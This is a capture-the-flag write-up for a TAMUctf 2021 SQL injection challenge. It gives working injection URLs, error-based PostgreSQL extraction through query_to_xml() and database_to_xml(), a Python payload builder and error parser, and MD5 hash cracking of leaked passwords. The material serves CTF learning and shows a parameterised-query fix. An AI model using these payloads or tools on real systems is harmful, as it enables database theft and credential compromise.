TAMUctf 2021 API 2 : The SeQueL Solution
TAMUctf 2021 API 2 : The SeQueL - 150 points
I just made my own SCP collection website. What do you think?
This is a simple SQL injection (SQLi) challenge that taught me some new tricks for SQL injection exploitation. I should have known these already, but that is how these sorts of things work.
The website appears to be referencing some sort of fiction with the initialism SCP. Since it's sometimes helpful, we search for SCP and find this: http://www.scpwiki.com/object-classes
Our first SQLi that gives us something interesting, using a simple UNION:
Improved SQLi with a valid containment:
Improved containment:
The canonical SQLi payload fails because the application appends a % (a LIKE wildcard) to whatever we send. Trying to OR in an id comparison makes this visible:
https://shell.tamuctf.com/problem/50034/?name=Cone%27%20or%20id=%271
pq: invalid input syntax for integer: "1%"
That explains the or '1'='1 problem I was having initially: once the % is appended, the comparison is '1'='1%', which is false.
Now we can build a working canonical SQLi: put the % inside our own literal so that the one the app appends balances it, giving '1%'='1%':
https://shell.tamuctf.com/problem/50034/?name=Cone%27%20or%20%271%25%27=%271
Success.
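As an added example (not code from the writeup), here is the LIKE-wildcard behaviour reproduced offline in Python against an in-memory SQLite table. The query shape, LIKE '<input>%' with the % appended by the application, is an assumption inferred from the "1%" error above, and the rows are constructed from the site's listing. SQLite is used only so it runs anywhere; one difference is that SQLite does not raise the integer-cast error PostgreSQL gave for id='1%', it just compares unequal.

```python
import sqlite3

# Constructed sample rows modelled on the challenge's listing; not the real database.
ROWS = [
    (1, "Default", "safe"),
    (2, "Teddy", "euclid"),
    (3, "Traffic Cone #88192", "neutralized"),
    (4, "Gnomial", "thaumiel"),
]


def make_db() -> sqlite3.Connection:
    """In-memory SQLite stand-in for the challenge's PostgreSQL table (assumed schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE scp (id INTEGER PRIMARY KEY, codename TEXT, containment TEXT)")
    conn.executemany("INSERT INTO scp VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_search(conn: sqlite3.Connection, name: str) -> list:
    """Assumed shape of the challenge's query: the raw input is spliced into a LIKE
    pattern and the app appends % before closing the quote. Whatever the user injects
    therefore always ends with the characters %' when it reaches the database."""
    sql = f"SELECT id, codename FROM scp WHERE codename LIKE '{name}%'"
    return conn.execute(sql).fetchall()


def safe_search(conn: sqlite3.Connection, name: str) -> list:
    """Parameterised version: the pattern is built in Python and bound as a value,
    so quotes in the input are data, not SQL."""
    return conn.execute(
        "SELECT id, codename FROM scp WHERE codename LIKE ?", (name + "%",)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    # Textbook payload: the appended % turns '1'='1 into '1'='1%', which is false,
    # so the OR adds nothing and only the LIKE 'Teddy' match comes back.
    print(vulnerable_search(db, "Teddy' or '1'='1"))
    # Adjusted payload: '1%'='1 becomes '1%'='1%', which is true, so every row leaks.
    print(vulnerable_search(db, "Teddy' or '1%'='1"))
    # The same payload against the parameterised query is just an odd codename prefix.
    print(safe_search(db, "Teddy' or '1%'='1"))
```

The parameterised version is the fix: the % belongs to the bound pattern value, not the SQL text, so a quote in the input can never close the literal.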
The website:
Codename : Default
ID : 1
SCP Containment : safe
default testing icon
Codename : Teddy
ID : 2
SCP Containment : euclid
To please the teddy, one must offer them a sacrifice of your finest tea
Codename : Traffic Cone #88192
ID : 3
SCP Containment : neutralized
We believe they appear from interdimensional rifts with no clear origin
Codename : Gnomial
ID : 4
SCP Containment : thaumiel
If encountered in the wild do not make eye contact. They only become more aggressive.
Codename : Ą̷̡̺̼̗͉̦̦̝̰̲͍͍͖͚̌̓̅̈͐̀̌̀̾̾͘̚̚̚͘̕d̴̻͓̫̭͎͙̮̲͖̭̖̬̦͉͗͒̈́̉̐͋͗̈́̑̄̉̍͑͘ͅd̸̛̙̮͚̩̦̘̗͛͛̓̂̀́̽̒͂͊́̚i̷̡̫͖͎͖͕͎͋̃̀̅̽̾͋͑̿́́͝͝ṡ̵̲̤̥̲̣͚̥̠̍ơ̸̼̒͊̏̅̀̽̿̊̅̈́͊̃̑̓͂͘ṅ̶̢̡͙̣̝̹͓̯̤͉̌̎͜ͅ
ID : 5
SCP Containment : apollyon
H̵̢̩̺̞̥̮̱̤̗̱̹͓̱͔͕̱̔̂̄̇̑̿̚͝Ė̵͍͔̈̂̑̃́̎̿͊͝͝ͅ ̴̢̛̣̦̽̃̿͠I̵̱͚͕͇̱̮͛͑̋́͐̔̓̑͂͘͠ͅS̷̪̝̲̫̝͙͓͒̇͂̍͗̍͐͜ ̷̪̹͕͙͍̭͎̖̺̘̈́̒̍Ȁ̷͚͇̘͓͓Ḽ̴̢̝̗̥̜̭̹̪͉͎̀̿̽R̴̛̗̾̌̂̌̉͊́͋̏E̷̛͉͍̫͆͂͐̍̏͆͒͊̌̚̕͜͝Ā̶̧̛̛̭̬͎̩̭̬̪̩̦̦͚͙̹̳̅̆͌̑͋̎̄͆̒͜͜ͅD̷̨̼̙̣̲̱͎̘̺͎͕̩͉̳̪̲͉̒̐͌̅͌͂͑͠Y̶̬͚̜̰͕̦̝̝͗͌͂͛́͊̈́̐̽̔͒̔͛͐̕͠ ̷͓͔͓̭̞̏̔́̄̋̍̎̽̎͒̈́́̇̊̕͠͠H̶̦̮̿̍͌̀̂̂͌̚̕Ẽ̶̢̛̦͖̖̪̖̬̜̭̄̎̋̎̄̓͒͌̄͌̽́̈R̷̨̢̡̨̖̩͈͖̺̤̳̜̼̱̭̩̤̈́̄̊̌̐̐̕̕͝ͅE̸̡̡̩͓͓̣̲̜͚̖̊̈́͊͒̓͘͜
https://shell.tamuctf.com/problem/50034/?name=A
So I am able to get every entry individually or all of them in a list.
From a quick web search I found the version() function, which I should have known about. It tells us that we're working with PostgreSQL:
PostgreSQL 11.11 (Debian 11.11-0+deb10u1) on x86_64-pc-linux-gnu, compiled by gcc (Debian 8.3.0-6) 8.3.0, 64-bit
All the SQLi from here on comes from this pretty cool PostgreSQL SQLi write-up: https://pulsesecurity.co.nz/articles/postgres-sqli
The trick is error-based extraction: query_to_xml() renders the result of an arbitrary query as a single text value, and CAST-ing that text to NUMERIC fails, so PostgreSQL echoes the whole value back in the error message. First, the pg_user system view:
https://shell.tamuctf.com/problem/50034/?name=Cone%27%20union%20select%20%271%27,%20%272%27,%20%27safe%27,(CASE%20WHEN%20((SELECT%20CAST(CHR(32)||(SELECT%20query_to_xml(%27select%20*%20from%20pg_user%27,true,true,%27%27))%20AS%20NUMERIC)=%271%27))%20THEN%20%27a%27%20ELSE%20%27b%27%20END),%275
pq: invalid input syntax for type numeric: " postgres 10 true true true true yeetus 16421 false false false false "
Then database_to_xml(), which dumps every table in the current database, including a users table whose admin row carries the flag in the password column:
https://shell.tamuctf.com/problem/50034/?name=Cone%27%20union%20select%20%271%27,%20%272%27,%20%27safe%27,(CASE%20WHEN%20((SELECT%20CAST(CHR(32)||(SELECT%20database_to_xml(true,true,%27%27))%20AS%20NUMERIC)=%271%27))%20THEN%20%27a%27%20ELSE%20%27b%27%20END),%275
pq: invalid input syntax for type numeric: " 1 Default safe default testing icon avatar 2 Teddy euclid To please the teddy, one must offer them a sacrifice of your finest tea teddy 3 Traffic Cone #88192 neutralized We believe they appear from interdimensional rifts with no clear origin cone 4 Gnomial thaumiel If encountered in the wild do not make eye contact. They only become more aggressive. gnome 5 Ą̷̡̺̼̗͉̦̦̝̰̲͍͍͖͚̌̓̅̈͐̀̌̀̾̾͘̚̚̚͘̕d̴̻͓̫̭͎͙̮̲͖̭̖̬̦͉͗͒̈́̉̐͋͗̈́̑̄̉̍͑͘ͅd̸̛̙̮͚̩̦̘̗͛͛̓̂̀́̽̒͂͊́̚i̷̡̫͖͎͖͕͎͋̃̀̅̽̾͋͑̿́́͝͝ṡ̵̲̤̥̲̣͚̥̠̍ơ̸̼̒͊̏̅̀̽̿̊̅̈́͊̃̑̓͂͘ṅ̶̢̡͙̣̝̹͓̯̤͉̌̎͜ͅ apollyon H̵̢̩̺̞̥̮̱̤̗̱̹͓̱͔͕̱̔̂̄̇̑̿̚͝Ė̵͍͔̈̂̑̃́̎̿͊͝͝ͅ ̴̢̛̣̦̽̃̿͠I̵̱͚͕͇̱̮͛͑̋́͐̔̓̑͂͘͠ͅS̷̪̝̲̫̝͙͓͒̇͂̍͗̍͐͜ ̷̪̹͕͙͍̭͎̖̺̘̈́̒̍Ȁ̷͚͇̘͓͓Ḽ̴̢̝̗̥̜̭̹̪͉͎̀̿̽R̴̛̗̾̌̂̌̉͊́͋̏E̷̛͉͍̫͆͂͐̍̏͆͒͊̌̚̕͜͝Ā̶̧̛̛̭̬͎̩̭̬̪̩̦̦͚͙̹̳̅̆͌̑͋̎̄͆̒͜͜ͅD̷̨̼̙̣̲̱͎̘̺͎͕̩͉̳̪̲͉̒̐͌̅͌͂͑͠Y̶̬͚̜̰͕̦̝̝͗͌͂͛́͊̈́̐̽̔͒̔͛͐̕͠ ̷͓͔͓̭̞̏̔́̄̋̍̎̽̎͒̈́́̇̊̕͠͠H̶̦̮̿̍͌̀̂̂͌̚̕Ẽ̶̢̛̦͖̖̪̖̬̜̭̄̎̋̎̄̓͒͌̄͌̽́̈R̷̨̢̡̨̖̩͈͖̺̤̳̜̼̱̭̩̤̈́̄̊̌̐̐̕̕͝ͅE̸̡̡̩͓͓̣̲̜͚̖̊̈́͊͒̓͘͜ crump 1 glenn 9651cbc7c0b5fb1a81f2858a07813c82 Making More Challenges 2 teddy e2ec2b31abe380b989ff057aef66377a PWNing Away 3 admin gigem{SQL_1nj3ct1ons_c4n_b3_fun} Away on Vacation "
We have the flag:
gigem{SQL_1nj3ct1ons_c4n_b3_fun}
The same dump also leaks two password hashes, 32 hex characters each, which look like unsalted MD5:
glenn 9651cbc7c0b5fb1a81f2858a07813c82
teddy e2ec2b31abe380b989ff057aef66377a
Let's crack them just in case.
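As an added example (my code, not the writeup's), the error-based payload above generalised in Python: error_payload() rebuilds the writeup's name= value around any inner query, payload_url() percent-encodes it the way the links in this post are, and extract_leak() pulls the leaked text out of the pq error. The base URL is the one from the writeup and nothing is sent over the network; the sample responses are constructed, the first from the pg_user error shown above (the browser dropped the XML tags, leaving space-separated column values), the second an ordinary result page.

```python
import re
from typing import Optional
from urllib.parse import quote

# Base URL from the writeup; used only to build strings, never requested here.
BASE = "https://shell.tamuctf.com/problem/50034/"

# PostgreSQL echoes the offending value verbatim when a CAST to NUMERIC fails.
LEAK_RE = re.compile(r'pq: invalid input syntax for type numeric: "(.*?)"', re.S)


def error_payload(inner_query: str, prefix: str = "Cone") -> str:
    """Rebuild the writeup's payload around an arbitrary inner query.

    The app appends %' to the input, so the value closes the LIKE string, UNIONs a
    five-column row to match the original SELECT, and leaves the last literal open
    for the app to finish. query_to_xml() renders the inner query's result as one
    text value that starts with '<', which can never parse as NUMERIC, so the cast
    always fails and the error message carries the whole text. The CHR(32) prefix
    is kept exactly as the writeup's payload has it.
    """
    escaped = inner_query.replace("'", "''")  # keep the inner query inside its literal
    xml = f"(SELECT query_to_xml('{escaped}',true,true,''))"
    cast = f"(SELECT CAST(CHR(32)||{xml} AS NUMERIC)='1')"
    case = f"(CASE WHEN ({cast}) THEN 'a' ELSE 'b' END)"
    return f"{prefix}' union select '1', '2', 'safe',{case},'5"


def payload_url(inner_query: str) -> str:
    """Full GET URL, percent-encoded like the writeup's links."""
    return f"{BASE}?name={quote(error_payload(inner_query), safe='')}"


def extract_leak(response_text: str) -> Optional[str]:
    """Return the leaked value from the pq error, or None if the page rendered normally."""
    m = LEAK_RE.search(response_text)
    return m.group(1).strip() if m else None


# Constructed response bodies (see lead-in).
SAMPLE_ERROR = (
    'pq: invalid input syntax for type numeric: " postgres 10 true true true true '
    'yeetus 16421 false false false false "'
)
SAMPLE_OK = "Codename : Teddy\nID : 2\nSCP Containment : euclid\n"

if __name__ == "__main__":
    print(payload_url("select * from pg_user"))
    print(extract_leak(SAMPLE_ERROR))
    print(extract_leak(SAMPLE_OK))
```

Swapping the inner query for something like select usename,passwd from pg_shadow or a select against the users table found by database_to_xml() is the whole workflow; the only thing that changes per target is the number of UNION columns.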
john --format=raw-md5 --rules --wordlist=crack/ai3words_order.txt ~/altsci/tamuctf/sqlpw.txt
No luck. Let's try Google.
https://www.google.com/search?client=firefox-b-1-d&q=9651cbc7c0b5fb1a81f2858a07813c82
echo -n 'star trek' | md5sum
9651cbc7c0b5fb1a81f2858a07813c82  -
The password for glenn is 'star trek', cool. (The -n matters: hashing the phrase with a trailing newline gives a different digest.)
echo -n 'teddy bear' | md5sum
e2ec2b31abe380b989ff057aef66377a  -
The password for teddy is 'teddy bear', cool.
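As an added example (not from the writeup), the same check done as a small offline wordlist attack in Python: the two hashes are the ones leaked above, and the candidate list is constructed here for illustration, standing in for a file such as a rockyou-style wordlist.

```python
import hashlib

# The two hashes leaked by the database_to_xml() dump above (from the writeup).
LEAKED = {
    "glenn": "9651cbc7c0b5fb1a81f2858a07813c82",
    "teddy": "e2ec2b31abe380b989ff057aef66377a",
}

# Constructed mini wordlist; a real run would stream a large file line by line.
WORDLIST = ["password", "letmein", "star wars", "star trek", "teddy bear", "qwerty123"]


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode()).hexdigest()


def crack_md5(hashes: dict, candidates) -> dict:
    """Return {user: plaintext} for every hash whose preimage is in candidates.

    The hashes are unsalted, so they are indexed once and each candidate is hashed a
    single time no matter how many users share it. Salting would force one hash
    computation per user per candidate, which is the point of salting.
    """
    by_hash = {}
    for user, h in hashes.items():
        by_hash.setdefault(h.lower(), []).append(user)
    found = {}
    for word in candidates:
        for user in by_hash.get(md5_hex(word), []):
            found[user] = word
    return found


if __name__ == "__main__":
    for user, pw in crack_md5(LEAKED, WORDLIST).items():
        print(f"{user}: {pw!r}")
```

The phrases have spaces in them, which is why a plain word list plus mangling rules can miss them while a search engine, which has indexed the digests of common phrases, finds them instantly.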
Change your passwords, folks, and don't use simple passphrases: an unsalted MD5 of a common phrase is one web search away.